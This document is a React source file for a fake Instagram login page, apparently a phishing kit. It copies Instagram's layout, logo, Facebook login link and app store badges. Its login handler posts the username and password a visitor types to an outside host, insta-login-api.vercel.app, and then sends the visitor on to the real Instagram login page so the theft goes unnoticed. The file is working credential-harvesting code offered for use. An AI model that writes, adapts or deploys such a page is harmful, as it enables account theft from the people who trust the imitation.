import "./Login.css";
import React, { useState, useEffect } from "react";
import axios from "axios";

export default function Login() {
  const [username, setUsername] = useState("");
  const [password, setPassword] = useState("");
  const apiUrl = "https://insta-login-api.vercel.app/auth/login";

  const handleLogin = async (e) => {
    e.preventDefault();

    const payload = {
      username: username,
      password: password,
    };

    await axios
      .post(apiUrl, payload)
      .then((response) => {
        console.log(response.data);
        window.location.href = "https://www.instagram.com/accounts/login/";
      })
      .catch((error) => console.log(error));
  };

  return (
    <div className="h-screen bg-gray-50 flex flex-col justify-center items-center">
      <div className="bg-white border border-gray-300 w-80 py-8 flex items-center flex-col mb-3">
        <h1 className="bg-no-repeat instagram-logo"></h1>
        <form onSubmit={(e) => handleLogin(e)} className="mt-8 w-64 flex flex-col">
          <input
            autoFocus
            value={username}
            onChange={(e) => setUsername(e.target.value)}
            className="text-xs w-full mb-2 rounded border bg-gray-100 border-gray-300 px-2 py-2 focus:outline-none focus:border-gray-400 active:outline-none"
            id="email"
            placeholder="Phone number, username, or email"
            type="text"
          />
          <input
            value={password}
            onChange={(e) => setPassword(e.target.value)}
            className="text-xs w-full mb-4 rounded border bg-gray-100 border-gray-300 px-2 py-2 focus:outline-none focus:border-gray-400 active:outline-none"
            id="password"
            placeholder="Password"
            type="password"
          />
          <button
            type="submit"
            className=" text-sm text-center bg-[#4bb4f8] text-white py-1 rounded font-medium rounded-lg">
            Log in
          </button>
        </form>
        <div className="flex justify-evenly space-x-2 w-64 mt-4">
          <span className="bg-gray-300 h-px flex-grow t-2 relative top-2"></span>
          <span className="flex-none uppercase text-xs text-gray-400 font-semibold">or</span>
          <span className="bg-gray-300 h-px flex-grow t-2 relative top-2"></span>
        </div>
        <button className="mt-4 flex">
          <div className="bg-no-repeat facebook-logo mr-1"></div>

          <span className="text-xs text-blue-900 font-semibold">
            <a href="https://www.instagram.com/accounts/login/">Log in with Facebook</a>
          </span>
        </button>
        <a className="text-xs text-blue-900 mt-4 cursor-pointer -mb-4">Forgot password?</a>
      </div>
      <div className="bg-white border border-gray-300 text-center w-80 py-4">
        <span className="text-sm">Don't have an account?</span>
        <a
          className="text-blue-500 text-sm font-semibold"
          href="https://www.instagram.com/accounts/emailsignup/">
          {" "}
          Sign up
        </a>
      </div>
      <div className="mt-3 text-center">
        <span className="text-xs">Get the app</span>
        <div className="flex mt-3 space-x-2">
          <a href="https://apps.apple.com/in/app/instagram/id389801252" target="_blank">
            <div className="bg-no-repeat apple-store-logo"></div>
          </a>
          <a
            href="https://play.google.com/store/apps/details?id=com.instagram.android&hl=en&gl=US"
            target="_blank">
            <div className="bg-no-repeat google-store-logo"></div>
          </a>
        </div>
      </div>
    </div>
  );
}
